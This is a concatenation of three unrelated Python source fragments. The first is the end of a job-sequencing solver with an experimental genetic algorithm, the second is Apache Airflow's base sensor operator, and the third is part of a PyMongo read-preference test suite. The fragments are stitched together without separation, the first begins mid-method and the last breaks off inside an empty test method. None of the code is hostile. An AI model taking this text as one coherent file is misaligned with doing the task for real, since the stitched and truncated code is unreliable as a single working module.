        for permutation in itertools.permutations(start):
            _,switches=self.minimizeSwitchesForJobSequence(permutation)
            if switches<best_switches:
                best_switches=switches
                best_sequence=permutation
        return best_sequence
    def debugVerifyJobSequence(self,job_sequence):
        """Assert job_sequence is a permutation of 0..n-1.
        NOTE(review): bare `raise` with no active exception produces a
        RuntimeError under Python 3 rather than a descriptive error."""
        if set(job_sequence) != set([i for i in range(self.n)]) or len(job_sequence) != self.n:
            raise
    def debugVerifySolution(self,job_sequence,tool_sequence):
        """Assert every job's tools are loaded at its step and the capacity is
        never exceeded (bare `raise` on violation, see debugVerifyJobSequence)."""
        i=0
        self.debugVerifyJobSequence(job_sequence)
        for j in job_sequence:
            needed=self.getToolsForJob(j)
            for t in needed:
                if not t in tool_sequence[i]:
                    raise
            if len(tool_sequence[i])>self.C:
                raise
            i+=1
########################################################################################################################
#
# Experimental: Genetic Algorithm
#
########################################################################################################################
class Individual:
    """One member of the genetic population: a job sequence plus the scores
    that HeuristicSolverGenetic.computeScores() attaches to it."""
    # Class-level defaults; computeScores() overwrites these per instance.
    sequence = []
    objective_value = 0
    distance_sum = 0
    objective_score = 0
    distance_score = 0
    def __init__(self, seq):
        self.sequence = seq
    def distance(self, other):
        """Hamming distance between this individual's sequence and other's."""
        own = self.sequence
        return sum(1 for pos in range(len(own)) if own[pos] != other.sequence[pos])
class HeuristicSolverGenetic(HeuristicSolver):
    """Experimental genetic algorithm on top of HeuristicSolver.

    Fixes over the original version:
    - `population` is now a per-instance attribute (the class-level list was
      mutated in place and therefore shared by every instance).
    - mutation / fallback-selection indices use randrange(len(population)),
      because randrange excludes its stop value: the old
      randrange(0, len-1) could never pick the last individual and raised
      ValueError for a population of size 1.
    - recombine() uses floor division (//) so the interchange size stays an
      int under Python 3.
    """
    population = []  # class-level fallback, kept for backward compatibility
    population_size_max = 300   # hard cap on population size per generation
    mutation_rate = 0.15        # fraction of the population mutated each generation
    reproduction_rate = 0.9     # offspring per generation, relative to population size
    def __init__(self):
        HeuristicSolver.__init__(self)
        self.population = []  # per-instance population (see class docstring)
    def seed(self, n):
        """Add n random individuals to the population."""
        for _ in range(n):
            self.population.append(Individual(self.constructJobSequenceRandom()))
    def iterate(self):
        """Run one generation: score, reproduce, cull the surplus, mutate."""
        self.computeScores()
        print("%d best score in %d"%(self.getBest().objective_value,len(self.population)))
        print("%f avg. objective"%(sum([i.objective_value for i in self.population])/float(len(self.population))))
        reproduction_distribution = self.buildReproductionDistribution()
        offspring = []
        for _ in range(int(len(self.population)*self.reproduction_rate)):
            a = self.select(reproduction_distribution)
            b = a
            while a == b:  # require two distinct parents
                b = self.select(reproduction_distribution)
            offspring.append(Individual(self.recombine(self.population[a].sequence,self.population[b].sequence)))
        print("%d offspring"%len(offspring))
        if len(self.population)+len(offspring) > self.population_size_max:
            # Cull enough individuals (weighted by p_death) to respect the cap.
            death_distribution = self.buildDeathDistribution()
            must_die = len(self.population)+len(offspring) - self.population_size_max
            dying = set()
            while len(dying) < must_die:
                dying.add(self.select(death_distribution))
            new_population = [ind for idx, ind in enumerate(self.population) if idx not in dying]
            print("%d died"%(len(self.population)-len(new_population)))
            self.population = new_population
        self.population.extend(offspring)
        for _ in range(int(len(self.population)*self.mutation_rate)):
            # randrange(len(...)) includes the final index (old code excluded it).
            index = random.randrange(len(self.population))
            self.population[index].sequence = self.mutate(self.population[index].sequence)
        print("%d mutations"%(int(len(self.population)*self.mutation_rate)))
        print("")
    def getBest(self):
        """Return the individual with the lowest (best) objective value."""
        return min(self.population, key=lambda individual: individual.objective_value)
    def fastForward(self):
        """Placeholder: intended to refine the whole population (e.g. via
        simulated annealing); not implemented."""
        pass
    def computeScores(self):
        """Compute objective value, diversity (pairwise Hamming distance sum)
        and the derived reproduction/death probabilities for every individual."""
        total_objective_sum = 0
        total_distance_sum = 0
        for individual in self.population:
            _,individual.objective_value=self.minimizeSwitchesForJobSequence(individual.sequence)
            individual.distance_sum=0
            for other in self.population:
                individual.distance_sum+=individual.distance(other)
            total_objective_sum+=individual.objective_value
            total_distance_sum+=individual.distance_sum
        avg_objective = total_objective_sum / float(len(self.population))
        avg_distance_sum = total_distance_sum / float(len(self.population))
        for individual in self.population:
            # Lower objective => higher score (quadratic emphasis); higher
            # diversity => higher score.  Fitness weights objective 3:1.
            individual.objective_score = 1 / ( float(individual.objective_value**2) / avg_objective**2)
            individual.distance_score = float(individual.distance_sum) / avg_distance_sum
            individual.score = (3*individual.objective_score+individual.distance_score)/4.0
            individual.p_reproduce = (1.0/len(self.population)) * individual.score
            individual.p_death = (1.0/len(self.population)) * (1.0/individual.score)
    def buildReproductionDistribution(self):
        """Return cumulative (start, end, index) intervals weighted by p_reproduce."""
        distribution=[]
        value=0
        for i,individual in enumerate(self.population):
            distribution.append( (value,value+individual.p_reproduce,i) )
            value+=individual.p_reproduce
        return distribution
    def buildDeathDistribution(self):
        """Return cumulative (start, end, index) intervals weighted by p_death."""
        distribution=[]
        value=0
        for i,individual in enumerate(self.population):
            distribution.append( (value,value+individual.p_death,i) )
            value+=individual.p_death
        return distribution
    def select(self, distribution):
        """Roulette-wheel sample an index from (start, end, index) intervals.

        Falls back to a uniform draw when the random point lands outside all
        intervals (the weights need not sum to exactly 1)."""
        r = random.uniform(0, 1)
        for start, end, index in distribution:
            if start <= r < end:
                return index
        return random.randrange(len(self.population))
    def recombine(self, sequence_a, sequence_b, initial_interchange_size=None):
        """Crossover: find the largest pair of slices (one per parent) that
        contain the same job set, copy B's slice ordering into A, then recurse
        with a smaller interchange size.  Returns a valid permutation because
        only equal-content slices are exchanged."""
        if initial_interchange_size is None:
            interchange_size = len(sequence_a) // 2  # '//' keeps this an int under Python 3
        else:
            interchange_size = initial_interchange_size
        found = False
        while not found and interchange_size > 2:
            interchange_size -= 1
            for i in range(0, len(sequence_a) - interchange_size):
                for j in range(0, len(sequence_b) - interchange_size):
                    set_a = set(sequence_a[i:i+interchange_size])
                    set_b = set(sequence_b[j:j+interchange_size])
                    if set_a == set_b:
                        found = True
                        interchange_locus_a = i
                        interchange_locus_b = j
                        break
                if found:
                    break
        if not found:
            return sequence_a
        new_sequence = copy.deepcopy(sequence_a)
        new_sequence[interchange_locus_a:interchange_locus_a+interchange_size] = copy.deepcopy(sequence_b[interchange_locus_b:interchange_locus_b+interchange_size])
        if interchange_size > 3:
            return self.recombine(new_sequence, sequence_b, interchange_size - 1)
        else:
            return new_sequence
    def mutate(self, sequence):
        """Return the first neighbor from a random single-swap neighborhood."""
        for new_sequence in singleRandomSwapNeighborhood(sequence):
            return new_sequence
# ----------------------------------------------------------------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import hashlib
import os
import time
from datetime import timedelta
from typing import Any, Callable, Dict, Iterable
from airflow.configuration import conf
from airflow.exceptions import (
AirflowException,
AirflowRescheduleException,
AirflowSensorTimeout,
AirflowSkipException,
)
from airflow.models import BaseOperator, SensorInstance
from airflow.models.skipmixin import SkipMixin
from airflow.models.taskreschedule import TaskReschedule
from airflow.ti_deps.deps.ready_to_reschedule import ReadyToRescheduleDep
from airflow.utils import timezone
# We need to keep the import here because GCSToLocalFilesystemOperator released in
# Google Provider before 3.0.0 imported apply_defaults from here.
# See https://github.com/apache/airflow/issues/16035
from airflow.utils.decorators import apply_defaults
class BaseSensorOperator(BaseOperator, SkipMixin):
    """
    Sensor operators are derived from this class and inherit these attributes.

    Sensor operators keep executing at a time interval and succeed when
    a criteria is met and fail if and when they time out.

    :param soft_fail: Set to true to mark the task as SKIPPED on failure
    :type soft_fail: bool
    :param poke_interval: Time in seconds that the job should wait in
        between each tries
    :type poke_interval: float
    :param timeout: Time, in seconds before the task times out and fails.
    :type timeout: float
    :param mode: How the sensor operates.
        Options are: ``{ poke | reschedule }``, default is ``poke``.
        When set to ``poke`` the sensor is taking up a worker slot for its
        whole execution time and sleeps between pokes. Use this mode if the
        expected runtime of the sensor is short or if a short poke interval
        is required. Note that the sensor will hold onto a worker slot and
        a pool slot for the duration of the sensor's runtime in this mode.
        When set to ``reschedule`` the sensor task frees the worker slot when
        the criteria is not yet met and it's rescheduled at a later time. Use
        this mode if the time before the criteria is met is expected to be
        quite long. The poke interval should be more than one minute to
        prevent too much load on the scheduler.
    :type mode: str
    :param exponential_backoff: allow progressive longer waits between
        pokes by using exponential backoff algorithm
    :type exponential_backoff: bool
    """

    ui_color = '#e6f1f2'  # type: str
    valid_modes = ['poke', 'reschedule']  # type: Iterable[str]

    # As the poke context in smart sensor defines the poking job signature only,
    # The execution_fields defines other execution details
    # for this tasks such as the customer defined timeout, the email and the alert
    # setup. Smart sensor serialize these attributes into a different DB column so
    # that smart sensor service is able to handle corresponding execution details
    # without breaking the sensor poking logic with dedup.
    execution_fields = (
        'poke_interval',
        'retries',
        'execution_timeout',
        'timeout',
        'email',
        'email_on_retry',
        'email_on_failure',
    )

    def __init__(
        self,
        *,
        poke_interval: float = 60,
        timeout: float = conf.getfloat('sensors', 'default_timeout'),
        soft_fail: bool = False,
        mode: str = 'poke',
        exponential_backoff: bool = False,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        self.poke_interval = poke_interval
        self.soft_fail = soft_fail
        self.timeout = timeout
        self.mode = mode
        self.exponential_backoff = exponential_backoff
        self._validate_input_values()
        # Smart-sensor support: whether the service is enabled globally, and
        # which sensor class names are allowed to be handled by it.
        self.sensor_service_enabled = conf.getboolean('smart_sensor', 'use_smart_sensor')
        self.sensors_support_sensor_service = set(
            map(lambda l: l.strip(), conf.get('smart_sensor', 'sensors_enabled').split(','))
        )

    def _validate_input_values(self) -> None:
        """Reject non-numeric/negative intervals and unknown modes early.

        :raises AirflowException: if ``poke_interval``, ``timeout`` or
            ``mode`` is invalid.
        """
        if not isinstance(self.poke_interval, (int, float)) or self.poke_interval < 0:
            raise AirflowException("The poke_interval must be a non-negative number")
        if not isinstance(self.timeout, (int, float)) or self.timeout < 0:
            raise AirflowException("The timeout must be a non-negative number")
        if self.mode not in self.valid_modes:
            raise AirflowException(
                f"The mode must be one of {self.valid_modes},'{self.dag.dag_id if self.has_dag() else ''}.{self.task_id}'; received '{self.mode}'."
            )

    def poke(self, context: Dict) -> bool:
        """
        Function that the sensors defined while deriving this class should
        override.
        """
        raise AirflowException('Override me.')

    def is_smart_sensor_compatible(self):
        """Return True when this task may be handled by the smart sensor service.

        Incompatible when the service is disabled or when any per-task
        callback is set (callbacks cannot run inside the shared service).
        """
        check_list = [
            not self.sensor_service_enabled,
            self.on_success_callback,
            self.on_retry_callback,
            self.on_failure_callback,
        ]
        for status in check_list:
            if status:
                return False

        # Only class names explicitly listed in config are eligible.
        operator = self.__class__.__name__
        return operator in self.sensors_support_sensor_service

    def register_in_sensor_service(self, ti, context):
        """
        Register ti in smart sensor service

        :param ti: Task instance object.
        :param context: TaskInstance template context from the ti.
        :return: boolean
        """
        poke_context = self.get_poke_context(context)
        execution_context = self.get_execution_context(context)

        return SensorInstance.register(ti, poke_context, execution_context)

    def get_poke_context(self, context):
        """
        Return a dictionary with all attributes in poke_context_fields. The
        poke_context with operator class can be used to identify a unique
        sensor job.

        :param context: TaskInstance template context.
        :return: A dictionary with key in poke_context_fields.
        """
        if not context:
            self.log.info("Function get_poke_context doesn't have a context input.")

        # NOTE(review): subclasses are expected to declare poke_context_fields;
        # if absent this getattr yields None and the comprehension raises.
        poke_context_fields = getattr(self.__class__, "poke_context_fields", None)

        result = {key: getattr(self, key, None) for key in poke_context_fields}
        return result

    def get_execution_context(self, context):
        """
        Return a dictionary with all attributes in execution_fields. The
        execution_context include execution requirement for each sensor task
        such as timeout setup, email_alert setup.

        :param context: TaskInstance template context.
        :return: A dictionary with key in execution_fields.
        """
        if not context:
            self.log.info("Function get_execution_context doesn't have a context input.")
        execution_fields = self.__class__.execution_fields

        result = {key: getattr(self, key, None) for key in execution_fields}
        # timedelta is not JSON/DB friendly; store plain seconds instead.
        if result['execution_timeout'] and isinstance(result['execution_timeout'], datetime.timedelta):
            result['execution_timeout'] = result['execution_timeout'].total_seconds()
        return result

    def execute(self, context: Dict) -> Any:
        """Poke repeatedly until the criteria is met, timeout, or reschedule."""
        started_at = None

        if self.reschedule:

            # If reschedule, use the start date of the first try (first try can be either the very
            # first execution of the task, or the first execution after the task was cleared.)
            first_try_number = context['ti'].max_tries - self.retries + 1
            task_reschedules = TaskReschedule.find_for_task_instance(
                context['ti'], try_number=first_try_number
            )
            if task_reschedules:
                started_at = task_reschedules[0].start_date
            else:
                started_at = timezone.utcnow()

            def run_duration() -> float:
                # If we are in reschedule mode, then we have to compute diff
                # based on the time in a DB, so can't use time.monotonic
                nonlocal started_at
                return (timezone.utcnow() - started_at).total_seconds()

        else:
            started_at = time.monotonic()

            def run_duration() -> float:
                nonlocal started_at
                return time.monotonic() - started_at

        try_number = 1
        log_dag_id = self.dag.dag_id if self.has_dag() else ""
        while not self.poke(context):
            if run_duration() > self.timeout:
                # If sensor is in soft fail mode but times out raise AirflowSkipException.
                if self.soft_fail:
                    raise AirflowSkipException(f"Snap. Time is OUT. DAG id: {log_dag_id}")
                else:
                    raise AirflowSensorTimeout(f"Snap. Time is OUT. DAG id: {log_dag_id}")
            if self.reschedule:
                # Free the worker slot and come back at the computed time.
                reschedule_date = timezone.utcnow() + timedelta(
                    seconds=self._get_next_poke_interval(started_at, run_duration, try_number)
                )
                raise AirflowRescheduleException(reschedule_date)
            else:
                time.sleep(self._get_next_poke_interval(started_at, run_duration, try_number))
                try_number += 1
        self.log.info("Success criteria met. Exiting.")

    def _get_next_poke_interval(self, started_at: Any, run_duration: Callable[[], float], try_number):
        """Using the similar logic which is used for exponential backoff retry delay for operators."""
        if self.exponential_backoff:
            # Clamp to at least 1: with poke_interval < 2 and try_number == 1
            # the int() truncation yields 0, and `run_hash % min_backoff`
            # below would raise ZeroDivisionError.
            min_backoff = max(int(self.poke_interval * (2 ** (try_number - 2))), 1)

            # Per-task deterministic jitter so many sensors don't wake in sync.
            run_hash = int(
                hashlib.sha1(f"{self.dag_id}#{self.task_id}#{started_at}#{try_number}".encode()).hexdigest(),
                16,
            )
            modded_hash = min_backoff + run_hash % min_backoff

            delay_backoff_in_seconds = min(modded_hash, timedelta.max.total_seconds() - 1)
            # Never sleep past the sensor's overall timeout.
            new_interval = min(self.timeout - int(run_duration()), delay_backoff_in_seconds)
            self.log.info("new %s interval is %s", self.mode, new_interval)
            return new_interval
        else:
            return self.poke_interval

    def prepare_for_execution(self) -> BaseOperator:
        task = super().prepare_for_execution()
        # Sensors in `poke` mode can block execution of DAGs when running
        # with single process executor, thus we change the mode to`reschedule`
        # to allow parallel task being scheduled and executed
        if conf.get('core', 'executor') == "DebugExecutor":
            self.log.warning("DebugExecutor changes sensor mode to 'reschedule'.")
            task.mode = 'reschedule'
        return task

    @property
    def reschedule(self):
        """Define mode rescheduled sensors."""
        return self.mode == 'reschedule'

    @property
    def deps(self):
        """
        Adds one additional dependency for all sensor operators that
        checks if a sensor task instance can be rescheduled.
        """
        if self.reschedule:
            return super().deps | {ReadyToRescheduleDep()}
        return super().deps
def poke_mode_only(cls):
    """
    Class Decorator for child classes of BaseSensorOperator to indicate
    that instances of this class are only safe to use poke mode.

    Will decorate all methods in the class to assert they did not change
    the mode from 'poke'.

    :param cls: BaseSensor class to enforce methods only use 'poke' mode.
    :type cls: type
    """

    def decorate(cls_type):
        # Pin `mode` with a property: reads always see 'poke', and any
        # attempt to assign a different value fails loudly.
        def mode_getter(_):
            return 'poke'

        def mode_setter(_, value):
            if value != 'poke':
                # Bug fix: report the offending value instead of the
                # (always-accepted) literal 'poke'.
                raise ValueError(f"cannot set mode to '{value}'.")

        if not issubclass(cls_type, BaseSensorOperator):
            raise ValueError(
                f"poke_mode_only decorator should only be "
                f"applied to subclasses of BaseSensorOperator,"
                f" got:{cls_type}."
            )

        cls_type.mode = property(mode_getter, mode_setter)

        return cls_type

    return decorate(cls)
# When the documentation build sets BUILDING_AIRFLOW_DOCS, replace the
# imported ``apply_defaults`` with an identity function so documented
# signatures keep their original headers.
if 'BUILDING_AIRFLOW_DOCS' in os.environ:
    # flake8: noqa: F811
    # Monkey patch hook to get good function headers while building docs
    apply_defaults = lambda x: x
| |
# Copyright 2011-2016 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the replica_set_connection module."""
import contextlib
import copy
import random
import sys
import pickle
sys.path[0:0] = [""]
from bson.py3compat import MAXSIZE
from bson.son import SON
from pymongo.errors import ConfigurationError, OperationFailure
from pymongo.message import _maybe_add_read_preference
from pymongo.mongo_client import MongoClient
from pymongo.read_preferences import (ReadPreference, MovingAverage,
Primary, PrimaryPreferred,
Secondary, SecondaryPreferred,
Nearest)
from pymongo.server_description import ServerDescription
from pymongo.server_selectors import readable_server_selector, Selection
from pymongo.server_type import SERVER_TYPE
from pymongo.write_concern import WriteConcern
from test.test_replica_set_client import TestReplicaSetClientBase
from test import (SkipTest,
client_context,
unittest,
db_user,
db_pwd)
from test.utils import connected, single_client, one, wait_until, rs_client
from test.version import Version
class TestSelections(unittest.TestCase):
    """Sanity-check truthiness of server Selection objects."""

    @client_context.require_connection
    def test_bool(self):
        c = single_client()

        wait_until(lambda: c.address, "discover primary")
        # A selection built from a populated topology is truthy ...
        topology_selection = Selection.from_topology_description(
            c._topology.description)
        self.assertTrue(topology_selection)
        # ... and becomes falsy once it holds no server descriptions.
        self.assertFalse(topology_selection.with_server_descriptions([]))
class TestReadPreferenceObjects(unittest.TestCase):
    """Read preference objects survive pickling and shallow copying."""

    prefs = [Primary(),
             Secondary(),
             Nearest(tag_sets=[{'a': 1}, {'b': 2}]),
             SecondaryPreferred(max_staleness=30)]

    def test_pickle(self):
        for preference in self.prefs:
            round_tripped = pickle.loads(pickle.dumps(preference))
            self.assertEqual(preference, round_tripped)

    def test_copy(self):
        for preference in self.prefs:
            duplicate = copy.copy(preference)
            self.assertEqual(preference, duplicate)
class TestReadPreferencesBase(TestReplicaSetClientBase):
    """Shared fixture: seed test data and report which member served a read."""

    @classmethod
    @client_context.require_secondaries_count(1)
    def setUpClass(cls):
        super(TestReadPreferencesBase, cls).setUpClass()

    def setUp(self):
        super(TestReadPreferencesBase, self).setUp()
        # Insert some data so we can use cursors in read_from_which_host
        self.client.pymongo_test.test.drop()
        # Write with w=<member count> so every member has the data before reads.
        self.client.get_database(
            "pymongo_test",
            write_concern=WriteConcern(w=self.w)).test.insert_many(
                [{'_id': i} for i in range(10)])

        self.addCleanup(self.client.pymongo_test.test.drop)

    def read_from_which_host(self, client):
        """Do a find() on the client and return which host was used
        """
        cursor = client.pymongo_test.test.find()
        next(cursor)
        return cursor.address

    def read_from_which_kind(self, client):
        """Do a find() on the client and return 'primary' or 'secondary'
        depending on which the client used.
        """
        address = self.read_from_which_host(client)
        if address == client.primary:
            return 'primary'
        elif address in client.secondaries:
            return 'secondary'
        else:
            # Address matched neither known primary nor secondaries.
            self.fail(
                'Cursor used address %s, expected either primary '
                '%s or secondaries %s' % (
                    address, client.primary, client.secondaries))

    def assertReadsFrom(self, expected, **kwargs):
        # Build a fresh client with the given options and verify the member
        # kind ('primary'/'secondary') a read lands on.
        c = rs_client(**kwargs)
        wait_until(
            lambda: len(c.nodes - c.arbiters) == self.w,
            "discovered all nodes")

        used = self.read_from_which_kind(c)
        self.assertEqual(expected, used, 'Cursor used %s, expected %s' % (
            used, expected))
class TestSingleSlaveOk(TestReadPreferencesBase):
    """Reads through a direct (single-server) connection to a secondary."""

    def test_reads_from_secondary(self):

        host, port = next(iter(self.client.secondaries))

        # Direct connection to a secondary.
        client = single_client(host, port)
        self.assertFalse(client.is_primary)

        # Regardless of read preference, we should be able to do
        # "reads" with a direct connection to a secondary.
        # See server-selection.rst#topology-type-single.
        self.assertEqual(client.read_preference, ReadPreference.PRIMARY)

        db = client.pymongo_test
        coll = db.test

        # Test find and find_one.
        self.assertIsNotNone(coll.find_one())
        self.assertEqual(10, len(list(coll.find())))

        # Test some database helpers.
        self.assertIsNotNone(db.collection_names())
        self.assertIsNotNone(db.validate_collection("test"))
        self.assertIsNotNone(db.command("count", "test"))

        # Test some collection helpers.
        self.assertEqual(10, coll.count())
        self.assertEqual(10, len(coll.distinct("_id")))
        self.assertIsNotNone(coll.aggregate([]))
        self.assertIsNotNone(coll.index_information())

        # Test some "magic" namespace helpers.
        self.assertIsNotNone(db.current_op())
class TestReadPreferences(TestReadPreferencesBase):
    """Exercise each read-preference mode against a live replica set."""

    def test_mode_validation(self):
        # Every predefined mode round-trips through client construction.
        for mode in (ReadPreference.PRIMARY,
                     ReadPreference.PRIMARY_PREFERRED,
                     ReadPreference.SECONDARY,
                     ReadPreference.SECONDARY_PREFERRED,
                     ReadPreference.NEAREST):
            self.assertEqual(
                mode,
                rs_client(read_preference=mode).read_preference)

        # Arbitrary non-ReadPreference values are rejected.
        self.assertRaises(
            TypeError,
            rs_client, read_preference='foo')

    def test_tag_sets_validation(self):
        S = Secondary(tag_sets=[{}])
        self.assertEqual(
            [{}],
            rs_client(read_preference=S).read_preference.tag_sets)

        S = Secondary(tag_sets=[{'k': 'v'}])
        self.assertEqual(
            [{'k': 'v'}],
            rs_client(read_preference=S).read_preference.tag_sets)

        S = Secondary(tag_sets=[{'k': 'v'}, {}])
        self.assertEqual(
            [{'k': 'v'}, {}],
            rs_client(read_preference=S).read_preference.tag_sets)

        # Empty list of tag sets is invalid.
        self.assertRaises(ValueError, Secondary, tag_sets=[])

        # One dict not ok, must be a list of dicts
        self.assertRaises(TypeError, Secondary, tag_sets={'k': 'v'})

        self.assertRaises(TypeError, Secondary, tag_sets='foo')

        self.assertRaises(TypeError, Secondary, tag_sets=['foo'])

    def test_threshold_validation(self):
        # localThresholdMS is case-insensitive and must be non-negative.
        self.assertEqual(17, rs_client(
            localThresholdMS=17
        ).local_threshold_ms)

        self.assertEqual(42, rs_client(
            localThresholdMS=42
        ).local_threshold_ms)

        self.assertEqual(666, rs_client(
            localthresholdms=666
        ).local_threshold_ms)

        self.assertEqual(0, rs_client(
            localthresholdms=0
        ).local_threshold_ms)

        self.assertRaises(ValueError,
                          rs_client,
                          localthresholdms=-1)

    def test_zero_latency(self):
        ping_times = set()
        # Generate unique ping times.
        while len(ping_times) < len(self.client.nodes):
            ping_times.add(random.random())
        for ping_time, host in zip(ping_times, self.client.nodes):
            # NOTE(review): monkey-patches a private class-level map to force
            # distinct RTTs; cleared again in the finally block below.
            ServerDescription._host_to_round_trip_time[host] = ping_time
        try:
            client = connected(
                rs_client(readPreference='nearest', localThresholdMS=0))
            wait_until(
                lambda: client.nodes == self.client.nodes,
                "discovered all nodes")
            host = self.read_from_which_host(client)
            # With a zero threshold, "nearest" must keep using the one
            # lowest-latency host.
            for _ in range(5):
                self.assertEqual(host, self.read_from_which_host(client))
        finally:
            ServerDescription._host_to_round_trip_time.clear()

    def test_primary(self):
        self.assertReadsFrom(
            'primary', read_preference=ReadPreference.PRIMARY)

    def test_primary_with_tags(self):
        # Tags not allowed with PRIMARY
        self.assertRaises(
            ConfigurationError,
            rs_client, tag_sets=[{'dc': 'ny'}])

    def test_primary_preferred(self):
        self.assertReadsFrom(
            'primary', read_preference=ReadPreference.PRIMARY_PREFERRED)

    def test_secondary(self):
        self.assertReadsFrom(
            'secondary', read_preference=ReadPreference.SECONDARY)

    def test_secondary_preferred(self):
        self.assertReadsFrom(
            'secondary', read_preference=ReadPreference.SECONDARY_PREFERRED)

    def test_nearest(self):
        # With high localThresholdMS, expect to read from any
        # member
        c = rs_client(
            read_preference=ReadPreference.NEAREST,
            localThresholdMS=10000)  # 10 seconds

        data_members = set(self.hosts).difference(set(self.arbiters))

        # This is a probabilistic test; track which members we've read from so
        # far, and keep reading until we've used all the members or give up.
        # Chance of using only 2 of 3 members 10k times if there's no bug =
        # 3 * (2/3)**10000, very low.
        used = set()
        i = 0
        while data_members.difference(used) and i < 10000:
            address = self.read_from_which_host(c)
            used.add(address)
            i += 1

        not_used = data_members.difference(used)
        latencies = ', '.join(
            '%s: %dms' % (server.description.address,
                          server.description.round_trip_time)
            for server in c._get_topology().select_servers(
                readable_server_selector))

        self.assertFalse(
            not_used,
            "Expected to use primary and all secondaries for mode NEAREST,"
            " but didn't use %s\nlatencies: %s" % (not_used, latencies))
class ReadPrefTester(MongoClient):
    """MongoClient subclass that records which servers serve its reads."""

    def __init__(self, *args, **kwargs):
        # Set of Server instances that have served a read; tests inspect it.
        self.has_read_from = set()
        client_options = client_context.ssl_client_options.copy()
        client_options.update(kwargs)
        super(ReadPrefTester, self).__init__(*args, **client_options)

    @contextlib.contextmanager
    def _socket_for_reads(self, read_preference):
        # Wrap the parent's socket context manager so we can log the
        # address the read actually used before yielding it through.
        context = super(ReadPrefTester, self)._socket_for_reads(read_preference)
        with context as (sock_info, slave_ok):
            self.record_a_read(sock_info.address)
            yield sock_info, slave_ok

    def record_a_read(self, address):
        # Resolve the address to a Server (0 = no selection timeout).
        server = self._get_topology().select_server_by_address(address, 0)
        self.has_read_from.add(server)
# Pairs of (read preference class, expected server type for reads).
# 'any' marks NEAREST, whose reads may land on any data-bearing member.
_PREF_MAP = [
    (Primary, SERVER_TYPE.RSPrimary),
    (PrimaryPreferred, SERVER_TYPE.RSPrimary),
    (Secondary, SERVER_TYPE.RSSecondary),
    (SecondaryPreferred, SERVER_TYPE.RSSecondary),
    (Nearest, 'any')
]
class TestCommandAndReadPreference(TestReplicaSetClientBase):
    """Verify commands and collection helpers route reads per preference."""

    @classmethod
    @client_context.require_secondaries_count(1)
    def setUpClass(cls):
        super(TestCommandAndReadPreference, cls).setUpClass()
        cls.c = ReadPrefTester(
            client_context.pair,
            replicaSet=cls.name,
            # Ignore round trip times, to test ReadPreference modes only.
            localThresholdMS=1000*1000)
        if client_context.auth_enabled:
            cls.c.admin.authenticate(db_user, db_pwd)
        cls.client_version = Version.from_client(cls.c)
        # mapReduce and group fail with no collection
        coll = cls.c.pymongo_test.get_collection(
            'test', write_concern=WriteConcern(w=cls.w))
        coll.insert_one({})

    @classmethod
    def tearDownClass(cls):
        cls.c.drop_database('pymongo_test')

    def executed_on_which_server(self, client, fn, *args, **kwargs):
        """Execute fn(*args, **kwargs) and return the Server instance used."""
        client.has_read_from.clear()
        fn(*args, **kwargs)
        # Exactly one server must have served the read.
        self.assertEqual(1, len(client.has_read_from))
        return one(client.has_read_from)

    def assertExecutedOn(self, server_type, client, fn, *args, **kwargs):
        server = self.executed_on_which_server(client, fn, *args, **kwargs)
        # Compare via _fields so a failure prints the type NAME, not an int.
        self.assertEqual(SERVER_TYPE._fields[server_type],
                         SERVER_TYPE._fields[server.description.server_type])

    def _test_fn(self, server_type, fn):
        for _ in range(10):
            if server_type == 'any':
                # NEAREST: probabilistic — keep reading until every
                # data-bearing member has been used, or fail after 1000 tries.
                used = set()
                for _ in range(1000):
                    server = self.executed_on_which_server(self.c, fn)
                    used.add(server.description.address)
                    if len(used) == len(self.c.secondaries) + 1:
                        # Success
                        break

                unused = self.c.secondaries.union(
                    set([self.c.primary])
                ).difference(used)
                if unused:
                    self.fail(
                        "Some members not used for NEAREST: %s" % (
                            unused))
            else:
                self.assertExecutedOn(server_type, self.c, fn)

    def _test_primary_helper(self, func):
        # Helpers that ignore read preference.
        self._test_fn(SERVER_TYPE.RSPrimary, func)

    def _test_coll_helper(self, secondary_ok, coll, meth, *args, **kwargs):
        # Run the named collection method under every preference in _PREF_MAP.
        # The lambda is invoked within the same iteration, so the loop
        # variables are bound as intended (no late-binding hazard here).
        for mode, server_type in _PREF_MAP:
            new_coll = coll.with_options(read_preference=mode())
            func = lambda: getattr(new_coll, meth)(*args, **kwargs)
            if secondary_ok:
                self._test_fn(server_type, func)
            else:
                self._test_fn(SERVER_TYPE.RSPrimary, func)

    def test_command(self):
        # Test that the generic command helper obeys the read preference
        # passed to it.
        for mode, server_type in _PREF_MAP:
            func = lambda: self.c.pymongo_test.command('dbStats',
                                                       read_preference=mode())
            self._test_fn(server_type, func)

    def test_create_collection(self):
        # Collections should be created on primary, obviously
        self._test_primary_helper(
            lambda: self.c.pymongo_test.create_collection(
                'some_collection%s' % random.randint(0, MAXSIZE)))

    def test_drop_collection(self):
        self._test_primary_helper(
            lambda: self.c.pymongo_test.drop_collection('some_collection'))

        self._test_primary_helper(
            lambda: self.c.pymongo_test.some_collection.drop())

    def test_group(self):
        self._test_coll_helper(True, self.c.pymongo_test.test, 'group',
                               {'a': 1}, {}, {}, 'function() { }')

    def test_map_reduce(self):
        self._test_coll_helper(False, self.c.pymongo_test.test, 'map_reduce',
                               'function() { }', 'function() { }',
                               {'inline': 1})

    def test_inline_map_reduce(self):
        self._test_coll_helper(True, self.c.pymongo_test.test,
                               'inline_map_reduce',
                               'function() { }', 'function() { }')

    def test_count(self):
        self._test_coll_helper(True, self.c.pymongo_test.test, 'count')

    def test_distinct(self):
